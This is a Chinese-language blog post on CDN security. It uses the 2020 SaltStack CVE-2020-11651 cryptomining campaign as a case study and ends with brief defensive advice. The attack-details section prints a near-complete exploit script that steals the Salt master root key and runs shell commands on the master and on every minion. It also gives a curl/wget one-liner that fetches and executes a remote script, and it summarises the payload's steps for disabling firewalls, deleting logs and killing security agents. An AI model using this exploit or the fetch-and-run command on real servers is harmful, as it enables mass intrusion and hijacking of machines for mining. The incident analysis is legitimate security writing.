浅谈CDN网络安全防护方案
导语:今天通过SaltStack漏洞这个药引子,聊聊CDN网络安全防护这个话题。
0x00、前言
今天通过SaltStack漏洞这个药引子,聊聊CDN网络安全防护这个话题。先聊聊,CDN定义:Content Delivery Network,内容分发网络,给用户带来的价值,加速获得其静态或者动态内容,典型的应用场景,360安全卫士中的软件安装,后台使用的就CDN网络。在比如目前比较火的抖音短视频,用户在某个地方上传视频后,几亿的用户都可以快速看到,很难想象,如果这个短视频在一台服务器上,几千万人同时去下载,网络堵塞延迟会多大?
再聊聊SaltStack,是一个服务器基础架构集中化管理平台,几分钟之内就可以运行起来,速度特别快,服务器之间秒级通讯,扩展性好,很容易批量管理上万台服务器,显著的降低人力与运维成本。它是简化版的puppet,saltstack基于Python语言实现,结合轻量级消息队列(ZeroMQ),Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建,SaltStack是一套C/S架构的运维工具,服务端口默认为4505/4506,两个端口如果对外网开放危害非常大。
目前商业化的CDN绝大部分都在使用SaltStack做软件分发系统。黑客利用SaltStack的远程命令执行漏洞CVE-2020-11651可以直接绕过Salt-Master的认证机制,调用相关函数向Salt-Minion下发指令执行系统命令,最终导致挖矿。
0x01、攻击详情
1、通过网络空间搜索引擎https://www.shodan.io/等获取 外网开发SaltStack master的主机列表。
2、通过cve-2020-11651.py批量执行,下载sa.sh脚本。获取到master key,在几分钟内就会吧命令传递到cdn服务器连接的client,*山云大约有几千台机器就是这么感染的。(curl -s x.x.x.x/sa.sh||wget -q -O- x.x.x.x/sa.sh)|sh
def ping_master(): print("Attempting to ping master at "+master_ip) try: msg = {"cmd":"ping"} response = clear_channel.send(msg, timeout=3) if response: return True except salt.exceptions.SaltReqTimeoutError: return False return False def get_rootkey(): try: response = clear_channel.send({'cmd':'_prep_auth_info'}, timeout=2) for i in response: if isinstance(i,dict) and len(i) == 1: rootkey = list(i.values())[0] print("Retrieved root key: " + rootkey) return rootkey return False except: return False def send_command_to_minions(command): print("Sending command to all minions on master") jid = "{0:%Y%m%d%H%M%S%f}".format(datetime.datetime.utcnow()) cmd = "/bin/sh -c '{0}'".format(command) msg = {'cmd':"_send_pub","fun":"cmd.run","arg":[cmd],"tgt":"*","ret":"","tgt_type":"glob","user":"root","jid":jid} try: response = clear_channel.send(msg,timeout=3) if response == None: return True else: return False except: return False def master_shell(root_key,command): msg = {"key":root_key, "cmd":"runner", 'fun': 'salt.cmd', "kwarg":{ "fun":"cmd.exec_code", "lang":"python3", "code":"import subprocess;subprocess.call('{}',shell=True)".format(command) }, 'jid': '20200504042611133934', 'user': 'sudo_user', '_stamp': '2020-05-04T04:26:13.609688'} try: response = clear_channel.send(msg,timeout=3) print("Got response for attempting master shell: "+str(response)+ ". Looks promising!") return True except: print("something failed") return False if __name__=="__main__": if len(sys.argv) <= 2: print("Not enough args") print("Use like python3 cve-2020-11651.py) sys.exit(1) target = sys.argv[1] master_minion_root = sys.argv[2] master_ip = target master_port = '4506' minion_config = { 'transport': 'zeromq', 'pki_dir': '/tmp', 'id': 'root', 'log_level': 'debug', 'master_ip': master_ip, 'master_port': master_port, 'auth_timeout': 5, 'auth_tries': 1, 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) } clear_channel = salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') if not ping_master(): print("Failed to ping the specified master server, exiting") sys.exit(1) if master_minion_root == "master" or master_minion_root == "minions": command = sys.argv[3] rootkey = get_rootkey() if not rootkey: print("Failed to fetch the root key from the instance. This MAY indicate that it is patched") sys.exit(1) else: if master_minion_root == "master": master_shell(rootkey,command) else: send_command_to_minions(command) elif master_minion_root == "fetchkeyonly": get_rootkey() else: print("Invalid usage")
3、执行sa.sh做以下操作:
@1、关闭防火墙、设置ulimit、系统syslog日志删除、设置tmp目录权限关闭watchdog,设置ssh共哟啊文件权限,清理tmp目录等。
@2、干掉安骑士,云镜(用齐自身卸载脚本操作),看来阿里云和腾讯云的CDN网络受到严重的摧残,也说明黑客分子在不断的进化当中,因为很多时候,这种下载脚本在本机上有主机安全软件的情况下,都是无效的。
@3、清理cpu资源占用超过10%的进程,保证有更多的硬件资源可以挖矿。也间接终止其他挖矿进程。同时清理docker形式运行的挖矿进程。
@4、然后下载salt-store,释放出罗门币挖矿进程。
4、salt-store执行以下操作
@1、使用masscan扫描redis服务器,二进制分析
@2、样本传到virustotal上发现连接的连接C2地址(IP地址)。
由于3、4网上有很多分析,我就不在赘述,不过从整个入侵过程来看,黑客搞的这个脚本目的是短平快,C2更新使用的IP而非域名,这个有点low,但是他把挖矿程序开足马力,能挖多久就挖多久,门罗币钱包为:
46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb
这个罗门币里面大约获利400万左右。正好赶上五一期间,但是黑客显然没有运维经验,CPU搞那么高,监控肯定能发现,大规模服务器出现CPU过高情况,肯定会有安全分析人员登录服务器检查。还有CDN会托管图片等静态资源,突然之间有超时的情况,也会引起重视的。估计4月30号开扫描,挖到5月3号。还有估计也没想到会有那么多CDN服务提供商中招。
0x02、CDN安全防护方案
针对CDN这种边缘服务,其实很难设计安全防护方案,因为,CDN厂商为了节省资源,二级节点一般部署10台二手服务器,处理带宽40~80G。一级节点也就20台服务器,做cache用。公有云CDN业务本身就是赔钱的买卖。你说上一套具备纵深防护体系的安全解决方案是不现实的。个人觉得只要在物理服务器上安装主机安全Agent就满足需求了。有的CDN厂商还在CDN机房扩建高防机房,复用带宽,这种情况下,针对主机层面的网络通讯流量,处理尤为重要。所以,主机安全Agent对网络流量的监控建议disable掉。主要能抓到挖矿进程就好。
发表评论